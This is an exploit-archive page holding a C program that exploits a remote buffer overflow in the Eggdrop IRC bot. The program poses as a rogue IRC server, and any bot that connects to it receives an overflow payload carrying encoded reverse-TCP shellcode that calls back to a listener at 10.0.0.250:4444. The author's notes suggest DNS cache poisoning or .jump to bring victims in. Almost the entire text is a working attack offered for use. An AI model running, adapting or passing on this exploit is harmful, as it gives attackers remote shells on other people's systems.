[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Eggdrop Server Module Message Handling Remote BoF Exploit
# Published : 2007-10-10
# Author : bangus/magnum
# Previous Title : Apple iTouch/iPhone 1.1.1 tif File Remote Jailbreak Exploit
# Next Title : Microsoft Visual FoxPro 6.0 FPOLE.OCX Arbitrary Command Execution
/*
Eggdrop Server Module Message Handling Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/24070
discovered by Bow Sineath
tested on eggdrop 1.6.18 / linux 2.4
-exploit is a fake ircd
replace shellcode.. strip 0x00,0x0a and a few more probably.
remember to add n at end of shellcode.
poison some dns cache or .jump
play.
-bangus/magnum
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <arpa/inet.h>
#define LISTENPORT 6667
#define BACKLOG 3
#define RETADDR 0xbffff7b9
/*
* linux/x86/shell_reverse_tcp - 99 bytes
* http://www.metasploit.com
* Encoder: x86/shikata_ga_nai
* LPORT=4444, LHOST=10.0.0.250
*/
unsigned char shellcode[] =
"xbfx1ax2fxf0x55xdbxc9xd9x74x24xf4x5bx31xc9xb1"
"x13x31x7bx12x83xebxfcx03x61x21x12xa0xa4xe6x81"
"x08x95x72x24xe5x7fxdbxa1x18xb2x5bx22x83xfcx63"
"x88xb4xb5xe2xebxeex1fx7dx06x11x9fx87x70x79x8e"
"x2bx3ex1fxe3x5ax21x6fx65x0dxf3xc3xe0x4cxb0x2e"
"x72xdcx5fx9ex5dx92xf7x88x8ex36x61x27x59x55x23"
"xe4xd0x7bx74x01x2fxfbx75x16"
"n";
char *req=
":hybrid7.debian.local NOTICE AUTH :*** Looking up your hostname...n"
":hybrid7.debian.local NOTICE AUTH :*** Checking Identn"
":hybrid7.debian.local NOTICE AUTH :*** No Ident responsen"
":hybrid7.debian.local NOTICE AUTH :*** Your forward and reverse DNS do not match, ignoring hostname.n"
":hybrid7.debian.local 001 tata :Welcome to the debian Internet Relay Chat Network tatan"
":hybrid7.debian.local 002 tata :Your host is hybrid7.debian.local[127.0.0.1/6667], running version hybrid-7.2.2.dfsg.1-debian-3n"
":hybrid7.debian.local 003 tata :This server was created Dec 6 2006 at 19:21:25n"
":hybrid7.debian.local 004 tata hybrid7.debian.local hybrid-7.2.2.dfsg.1-debian-3 DGabcdfgiklnorsuwxyz biklmnopstveIh bkloveIhn"
":hybrid7.debian.local 005 tata CALLERID CASEMAPPING=rfc1459 DEAF=D KICKLEN=160 MODES=4 NICKLEN=15 PREFIX=(ohv)@%+ STATUSMSG=@%+ TOPICLEN=350 NETWORK=debian MAXLIST=beI:25 MAXTARGETS=4 CHANTYPES=#& :are supported by this servern"
":hybrid7.debian.local 005 tata CHANLIMIT=#&:15 CHANNELLEN=50 EXCEPTS=e INVEX=I CHANMODES=eIb,k,l,imnpst AWAYLEN=160 KNOCK ELIST=CMNTU SAFELIST :are supported by this servern"
":hybrid7.debian.local 251 tata :There are 0 users and 3 invisible on 1 serversn"
":hybrid7.debian.local 254 tata 1 :channels formedn"
":hybrid7.debian.local 255 tata :I have 3 clients and 0 serversn"
":hybrid7.debian.local 265 tata :Current local users: 3 Max: 3n"
":hybrid7.debian.local 266 tata :Current global users: 3 Max: 3n"
":hybrid7.debian.local 250 tata :Highest connection count: 3 (3 clients) (10 connections received)n"
":hybrid7.debian.local 375 tata :- hybrid7.debian.local Message of the Day - n"
":hybrid7.debian.local 376 tata :End of /MOTD command.n"
":tata!ab@i.love.debian.org MODE tata :+in";
int main() {
int s,conn;
struct sockaddr_in addr, cli_addr;
int size = sizeof(struct sockaddr_in);
unsigned long retaddr=RETADDR;
char data[393+sizeof(shellcode)];
if ((s = socket(AF_INET, SOCK_STREAM,0)) == -1) {
perror("socket");
return(-1);
}
memset((char *) &addr, 0, sizeof(struct sockaddr_in));
addr.sin_family = AF_INET;
addr.sin_port = htons(LISTENPORT);
addr.sin_addr.s_addr = htonl(INADDR_ANY);
if (bind(s,(struct sockaddr *)&addr, size) == -1) {
perror("bind");
return(-1);
}
if (listen(s,BACKLOG) == -1) {
perror("listen");
return(-1);
}
while(1) {
conn = accept(s, (struct sockaddr *)&cli_addr, &size);
if (conn == -1) {
perror("accept");
return (-1);
}
printf("connection from %s.n", inet_ntoa(cli_addr.sin_addr));
sleep(1);
printf("sending greeting.n");
send(conn,req,strlen(req),0);
sleep(1);
memset(data, 0x41, sizeof(data));
memcpy(data,":",1);
memcpy(data+365, &retaddr, sizeof(long));
memcpy(data+369," PRIVMSG Lamestb0t :test",24);
memcpy(data+393,shellcode,sizeof(shellcode));
printf("sending %d bytes of data.n",sizeof(data));
send(conn,data, sizeof(data), 0);
sleep(10);
printf("closing connection.n");
close(conn);
}
close(s);
return 0;
}
// www.Syue.com [2007-10-10]